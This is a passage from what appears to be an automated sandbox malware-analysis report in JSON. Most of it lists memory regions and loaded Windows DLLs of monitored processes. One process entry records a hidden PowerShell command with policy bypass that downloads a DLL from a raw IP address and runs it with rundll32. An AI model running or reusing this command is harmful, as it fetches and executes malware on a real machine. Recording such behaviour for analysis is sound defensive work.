"memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:20.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_427", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:20.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 1605631, "entry_point": 0, "filename": null, "id": "region_428", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:20.706", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000429-addr_0x0000000000190000-size_0x0000000000010000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1703935, "entry_point": 0, "filename": null, "id": "region_429", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:20.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_430", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:20.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_431", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:20.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 0, "filename": null, "id": "region_432", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:20.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_433", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:00:20.711", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000434-addr_0x00000000001c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_434", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:20.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_435", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:00:20.711", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000436-addr_0x00000000003e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_436", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:00:20.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 17891327, "entry_point": 0, "filename": null, "id": "region_437", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:00:20.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 17891328, "type": "region", "version": 1 }, "end_va": 19345407, "entry_point": 0, "filename": null, "id": "region_438", "name": "pagefile_0x0000000001110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17891328, "timestamp": "00:00:20.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19398656, "type": "region", "version": 1 }, "end_va": 22343679, "entry_point": 19398656, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_439", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19398656, "timestamp": "00:00:20.751", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_3", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000440-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_440", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:20.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_441", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:20.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_442", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:20.768", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000443-addr_0x0000000000190000-size_0x0000000000040000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_443", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:20.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 572850176, "type": "region", "version": 1 }, "end_va": 573317119, "entry_point": 572850176, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_444", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 572850176, "timestamp": "00:00:20.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_445", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:20.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_446", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:20.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_447", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:20.778", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000448-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_448", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:20.779", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000449-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_449", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:20.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_450", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:20.801", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_451", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:20.801", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_452", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:20.801", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000453-addr_0x0000000000150000-size_0x0000000000010000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_453", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:20.802", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000454-addr_0x0000000000250000-size_0x0000000000100000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_454", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:00:20.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1806893056, "type": "region", "version": 1 }, "end_va": 1807196159, "entry_point": 1806904916, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_455", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1806893056, "timestamp": "00:00:20.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947992064, "type": "region", "version": 1 }, "end_va": 1948073983, "entry_point": 1947992064, "filename": "\\Windows\\System32\\atl.dll", "id": "region_456", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947992064, "timestamp": "00:00:20.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_457", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:20.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_458", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:20.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_459", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:20.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_460", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:20.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_461", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:20.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_462", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:20.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_463", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:20.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_464", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:20.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_465", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:20.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_466", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:20.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_467", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:20.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_468", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:20.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_469", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:20.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_470", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:20.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 4292607, "entry_point": 0, "filename": null, "id": "region_471", "name": "pagefile_0x0000000000350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3473408, "timestamp": "00:00:20.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_472", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:20.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_473", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:20.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_474", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:20.909", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_475", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:20.909", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_476", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:20.909", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000477-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_477", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:20.917", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000478-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_478", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:20.917", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000479-addr_0x0000000000110000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_479", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:20.917", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000480-addr_0x0000000000210000-size_0x0000000000010000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_480", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:20.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5378047, "entry_point": 0, "filename": null, "id": "region_481", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:20.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 18022399, "entry_point": 0, "filename": 